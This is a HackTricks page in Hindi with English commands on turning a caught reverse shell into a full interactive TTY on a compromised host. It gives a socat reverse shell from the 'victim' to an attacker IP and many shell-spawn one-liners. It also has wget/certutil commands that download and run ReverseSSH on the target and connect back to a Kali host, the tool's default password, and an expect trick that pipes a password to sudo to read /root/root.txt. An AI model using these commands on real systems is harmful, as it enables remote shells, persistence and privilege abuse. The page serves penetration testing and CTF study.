Full TTYs

Support HackTricks

Full TTY

ध्यान दें कि SHELL वेरिएबल में सेट किया गया शेल ज़रूर /etc/shells के अंदर सूचीबद्ध होना चाहिए या The value for the SHELL variable was not found in the /etc/shells file This incident has been reported। इसके अलावा, ध्यान दें कि अगले स्निपेट केवल बैश में काम करते हैं। यदि आप zsh में हैं, तो शेल प्राप्त करने से पहले bash चलाकर बैश में बदलें।

Python

python3 -c 'import pty; pty.spawn("/bin/bash")'

(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

आप stty -a चलाकर पंक्तियों और स्तंभों की संख्या प्राप्त कर सकते हैं।

स्क्रिप्ट

script /dev/null -qc /bin/bash #/dev/null is to not store anything
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

socat

#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444

#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

शेल उत्पन्न करें

  • python -c 'import pty; pty.spawn("/bin/sh")'

  • echo os.system('/bin/bash')

  • /bin/sh -i

  • script -qc /bin/bash /dev/null

  • perl -e 'exec "/bin/sh";'

  • perl: exec "/bin/sh";

  • ruby: exec "/bin/sh"

  • lua: os.execute('/bin/sh')

  • IRB: exec "/bin/sh"

  • vi: :!bash

  • vi: :set shell=/bin/bash:shell

  • nmap: !sh

ReverseSSH

इंटरएक्टिव शेल एक्सेस, साथ ही फाइल ट्रांसफर और पोर्ट फॉरवर्डिंग के लिए एक सुविधाजनक तरीका है लक्षित पर स्थिर-लिंक्ड ssh सर्वर ReverseSSH को छोड़ना।

नीचे x86 के लिए एक उदाहरण है जिसमें upx-संपीड़ित बाइनरी हैं। अन्य बाइनरी के लिए, रिलीज़ पृष्ठ देखें।

  1. ssh पोर्ट फॉरवर्डिंग अनुरोध को पकड़ने के लिए स्थानीय रूप से तैयार करें:

# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh

/dev/shm/reverse-ssh -v -l -p 4444
  • (2a) लिनक्स लक्ष्य:

# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh

/dev/shm/reverse-ssh -p 4444 kali@10.0.0.2
# Drop it via your preferred way, e.g.
certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe

reverse-ssh.exe -p 4444 kali@10.0.0.2
  • यदि ReverseSSH पोर्ट फॉरवर्डिंग अनुरोध सफल रहा, तो आप अब reverse-ssh(.exe) चला रहे उपयोगकर्ता के संदर्भ में डिफ़ॉल्ट पासवर्ड letmeinbrudipls के साथ लॉग इन करने में सक्षम होना चाहिए:

# Interactive shell access
ssh -p 8888 127.0.0.1

# Bidirectional file transfer
sftp -P 8888 127.0.0.1

No TTY

यदि किसी कारणवश आप एक पूर्ण TTY प्राप्त नहीं कर सकते हैं, तो आप फिर भी उन कार्यक्रमों के साथ इंटरैक्ट कर सकते हैं जो उपयोगकर्ता इनपुट की अपेक्षा करते हैं। निम्नलिखित उदाहरण में, पासवर्ड sudo को एक फ़ाइल पढ़ने के लिए पास किया जाता है:

expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact'
HackTricks का समर्थन करें

Last updated